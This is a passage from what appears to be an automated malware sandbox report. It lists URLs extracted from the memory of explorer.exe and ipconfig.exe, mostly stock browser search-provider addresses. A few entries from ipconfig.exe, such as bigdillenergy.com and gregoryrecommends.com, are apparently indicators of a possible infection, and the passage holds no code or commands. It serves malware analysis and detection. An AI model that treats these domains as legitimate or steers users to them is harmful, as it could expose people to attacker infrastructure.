Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000006.00000000.2150295147.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000006.00000002.2345242648.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmp	String found in binary or memory: http://www.bigdillenergy.com
Source: ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmp	String found in binary or memory: http://www.bigdillenergy.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmp	String found in binary or memory: http://www.gregoryrecommends.com/nopage_error.html
Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: ipconfig.exe, 00000007.00000002.2345511470.0000000002A12000.00000004.00000001.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2142382696.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2156461233.00000000082FD000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000002.2344900431.0000000000260000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
